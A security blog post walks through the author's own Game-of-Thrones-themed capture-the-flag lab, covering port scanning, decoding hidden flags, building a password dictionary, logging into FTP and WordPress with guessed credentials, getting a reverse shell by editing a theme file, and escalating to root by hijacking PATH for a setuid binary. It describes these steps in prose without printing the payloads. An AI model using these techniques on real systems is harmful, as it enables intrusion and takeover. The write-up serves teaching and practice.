Safetech Blog - Security Tips and Tricks


by Oana Stoian

CTF-USV Writeup

This Write-up is written after CTF-USV 2016 contest, where students had the challenge to conquer 7 flags. We used the Facebook CTF Platform, where each flag had assigned a country.

The theme of the Capture the Flag contest was Game of Thrones. Everyone is watching the series, right? 🙂

 

Running nmap a LOT of opened ports were displayed:

nmap

 

Trying with amap tool to fingerprint the opened services we noticed some strange banners to most of the  opened ports.

 

amap

 

After a quick search on google we might have a clue why we have so many ports opened:

fuzz_here

 

Looks like portspoof tool is used to confuse the potential attacker by opening a lot of ports.
We tried to focus on well-known services first, and see where this will get us.
On port 80 there is a web server running, but we receive an Access forbidden message:

access-forbidden

 

Looking at the Http Headers we quickly notice a string that seems to be base64 encoded in X-XSS-Protection header:

xss-protection

The result of the string decoded is our first flag:

We continued to look on common services and we tried to connect to SSH server. Of course I didn’t hope that I would also find a valid password, but I was curious if there is a banner.

A dragon says welcome to the curious visitors 🙂

dragon-in-banner-ssh

Looking closer at the image with the dragon, can be observed that is something connected with AES ECB. Below the dragon is an encypted string, and near to the dragon’s tail is the key.

With an online application for AES decryption, the second flag was revealed:

So, what other common services are there?

Well, there is a Mysql server on TCP 3306 and a Squid proxy server – not on 3128 TCP but on 3129 TCP port…. this is too close to be unintentional.  🙂

What if we set it as a proxy in our browser and try to access that web server on port 80 again?
30 seconds later this page was displayed:

first-page

 

By firing-up nikto, taking into account that you have to use the command with the proxy defined, a directory /blog will be found, among other information.

blog

Indeed, we found the blog of The Seven Kingdoms :mrgreen:

blog1

 

We analyzed the information on the blog and two posts caught our attention: one of them is password protected and the other one is entitled “I have a message for you!” :roll:

 

hodor-message

The picture was analyzed for metadata; apparently in the source code of the web page there was nothing interesting, except for a folder named hodor where the picture was stored. Going to the folder there was another clue, a zip archive named – what else – hodor.zip, containing a file named hodor:

hodor-message3

Extracted file from the archive contains a „JFIF” header. I renamed it with .jpg extension and here is our third flag.

hodor

 

 

This translates to :

Now, let’s return  to the other post…password protected. Trying to centralize all the information gathered, nothing ring a bell …just that we have a password and that we have to crack it.
From our experience as penetration testers, it is always a good idea to build a custom dictionary based on the application tested.
A useful tool for generating a dictionaty based on words on a website is cewl….and the password for the protected post is Westerosi. With this we’ve got our fourth flag:

password-protected

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

Now that we get rid of Hodor, seems that Khaleesi, mother of dragons has something to hide. But where?
Thinking again at all the services that nmap revealed, that “She uses Field Training Preparation for her army” and also about what kind of service could possibly have  a name and a password, we could try a brute force on each service, having the username: mother_of_dragons.

 

In the post says that “the password is in front of your eyes”, so why won’t you try: “in front of your eyes” as the password? A little bit tricky, right? >:)
The FTP service, that is on port 21211  resulted to have the credentials “mother_of_dragons” and “in front of your eyes”.

On the FTP, there are two files, a readme.txt which will lead us to a hidden note.txt. The message of the note is:

I always forgot passwords, so for my blog account I used my children’s names.

-= Daenerys =- ”

Next step is to login into wordpress with the user: mother_of_dragons and the password composed of her children’s names. With a little search on google, you can find out that the  name of the dragons are: Drogon, Viserion, Rhaegal.

profile_wordpress

 

In Daenerys’ profile can be found the fifth flag:

Now that we have acces to the wordpress with administrative rights we can execute commands and obtain reverse shell.

I edited one of the themes file, put some php code in it, and the reverese shell is here:

shell

I start looking for various information on the system like runnig processes, which users accounts are present and so on…when I looked on the home folder of http user , I found the sixth flag.

reward-flag

 

This decodes to:

Also in /srv/http/ folder there is a file named winterfell_messenger, which is owned by root and has setuid bit set. We tried to run this binary to see what happens:

f7_0

We analyze the binary with strings tool and observe that it uses cat command to read /root/message.txt file. The interesting thing is that cat is used with a relative path and not with absolute path. This means that we might manipulate PATH environment variable, create a file named „cat” with some arbitray commands in it, and execute it as root  💡

f7_2

Once we are root, the seventh flag is ours:

f7_3

 

That`s all folks!

We hope you will enjoy getting all the flags at least as much as we enjoyed creating them 🙂

6,805 total views, 2 views today





Comments

  1. By sotonasgilbakso

    Reply

    • By Oana Stoian

      Reply

  2. By rK

    Reply

    • By Oana Stoian

      Reply

  3. Reply

    • By Oana Stoian

      Reply

  4. By AngryBird

    Reply

    • By Oana Stoian

      Reply

Leave a Reply

Your email address will not be published. Required fields are marked *